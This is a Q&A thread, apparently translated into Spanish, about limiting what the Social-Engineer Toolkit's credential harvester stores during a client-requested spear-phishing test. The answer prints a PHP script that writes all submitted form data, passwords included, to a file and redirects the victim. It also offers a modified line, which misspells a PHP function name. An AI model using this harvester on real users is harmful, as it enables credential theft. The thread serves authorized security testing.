Setoolkit - cosechador de credenciales, solo muestra el primer carácter de la contraseña

0

Estoy lanzando una campaña de spear phishing y mi cliente me ha pedido específicamente que solo elimine el primer carácter de la contraseña, ¿hay alguna manera de hacerlo?

Básicamente, en lugar de mostrar la contraseña completa cuando un usuario ingresa la suya, quiero que solo aparezca el primer carácter.

De lo contrario, ¿es posible producir un hash cuando la contraseña se envía al servidor de apache?

    
pregunta winsmak 08.07.2016 - 11:00
fuente

1 respuesta

1

Si está usando la opción en la que estoy pensando, su formulario clonado está POSTing to post.php. Puedes editar ese script para que haga lo que quieres.

<?php
$file = 'harvester_sdfskksdks.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>

<meta http-equiv="refresh" content="0; url=http://0.0.0.0:8000/index.html" />

En lugar de escribir todas las var. $ _POST, simplemente hazlo

file_puts_content($file, $_POST['login'] . ':' . substr($_POST['password'], 0, 1), FILE_APPEND)
    
respondido por el rgehan 08.07.2016 - 16:17
fuente

Lea otras preguntas en las etiquetas